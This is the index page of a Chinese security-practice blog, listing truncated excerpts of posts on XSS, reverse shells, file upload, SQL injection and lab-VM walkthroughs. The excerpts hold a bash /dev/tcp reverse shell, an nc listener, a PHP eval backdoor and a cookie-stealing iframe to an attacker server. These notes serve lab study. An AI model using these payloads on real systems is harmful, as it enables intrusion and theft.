Kyon-H Blog

「离开世界之前 一切都是过程」

XSS

XSS

XSS XSS(Reflected) LOW 1 2 3 4 5 6 7 #获取Cookie <script>alert('document.cookie')</script> #访问攻击者服务器 <iframe src='http://ip/time.jpg'></iframe> #向攻击者服务器发送cookie #nc -nvlp 80...

反弹WebShell

反弹WebShell

bash 1 2 3 4 # 攻击机 nc -lvvp port # 目标机 bash -i >& /dev/tcp/x.x.x.x/port 0>&1 1 2 3 4 5 6 7 8 9 # 方法2 exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/x.x.x.x/4444; ...

File Upload

File Upload

文件上传漏洞 LOW the.php 1 <?php eval($_GET['bckdor'])?> 构造url: http://192.168.30.131/dvwa/hackable/uploads/the.php?bckdor= 1 2 phpinfo(); system('ls'); 中国菜刀 1 <?php eval($_POST['bckd...

jangow 01

jangow 01

jangow 01 靶机 ip:192.168.56.118 kali 攻击机 ip:172.17.46.146 1. nmap 扫描 IP 靶机 IP 已知: 1 nmap -A 192.168.56.118 2. 扫描目录 1 dirb http://192.168.56.118 1 2 3 http://192.168.56.118/server-status ...

The PLANETS:EARTH

The PLANETS:EARTH

The PLANETS:EARTH kali 攻击机 ip:192.168.30.130 靶机 ip:192.168.30.136 注:靶机若为仅主机模式,后面无法反弹 shell 1. 网络扫描 1 arp-scan -l 1 nmap -A 192.168.30.136 DNS:earth.local, DNS:terratest.earth.local 发现...

Web Machine (N7)

Web Machine (N7)

Web Machine (N7) 靶机 ip:192.168.56.101 kali 攻击机 ip:192.168.56.102 注:关于 vmware 和 virtual box 虚拟机如何建立网络连接,详见:不同虚拟化平台的虚拟机之间进行网络通信 - 简书 1. 使用 nmap 扫描 c 段 1 2 3 4 nmap -sS 192.168.56.0/24 # 发现192.16...

EMPIRE: LUPINONE

EMPIRE: LUPINONE

EMPIRE: LUPINONE Difficulty: Medium kali攻击机ip:192.168.30.130 靶机ip:192.168.30.135 网络扫描 1 nmap -A 192.168.30.135 开放22、80端口,扫描文件 1 dirb 192.168.30.135 发现robots.txt,内容: 1 2 User-agent: * Di...

Prime_Series_Level-1

Prime_Series_Level-1

Prime_Series_Level-1 IP 扫描 使用 nmap 1 nmap -sP 192.168.30.0/24 ip 为 192.168.30.134 1 nmap -A 192.168.30.134 开放端口 80 和 22 目录扫描 1 dirb http://192.168.30.134 发现有 wordpress(博客网站通用框架),访问htt...

SQL注入

SQL注入

dvwa、pikachu 之 sql 注入 SQL 注入 1.SQL 注入分类 1 2 3 4 5 6 按SQLMap中的分类来看,SQL注入类型有以下 5 种: UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) Boolean-based blind SQL injection(...